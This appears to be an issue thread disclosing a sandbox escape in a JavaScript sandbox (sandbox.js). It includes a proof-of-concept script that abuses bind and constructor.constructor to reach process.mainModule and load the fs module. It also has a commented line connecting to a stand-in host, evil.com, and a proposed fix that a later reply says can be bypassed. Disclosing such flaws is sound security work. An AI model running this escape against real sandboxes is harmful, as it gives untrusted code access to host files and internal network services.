Code can get access to sandbox.js's scope

[io4]

Code can use bind to make exit or runTask (this one wont exit) run its own function, doing that it will get access to the parameters that this function has: the error (useless), connection (a net.Socket) and its constructor, the net module which might be used for bad/unwanted things like using server internal services.

Edit: I found you can even escape to the sandbox.js context, with access to almost everything (http://stackoverflow.com/questions/20899863/the-module-property-is-undefined-when-using-vm-runinthiscontext) but that can be overriden by getting to require from process.mainModule: (new a.constructor.constructor("return global"))().process.mainModule.constructor._load("fs")

Proof of Concept:

The idea is to replace _this and _this._sendError with what you want, inside it you could either modify current socket or create a new one:

var _this={};
_this._sendError=function(a,b){
    // (new a.constructor).connect({host:"evil.com",port:8001});
   (new a.constructor.constructor("return this"))().process.mainModule.constructor._load("fs");
};
var o={};
o.o=o;
runTask.bind(_this)("msg",o); // Intended error in JSON.stringify

[moonheart08]

The bug can be countered by setting runTask.bind and exit.bind to undefined. (Credit to io4) Edit: can be gotten past using constructors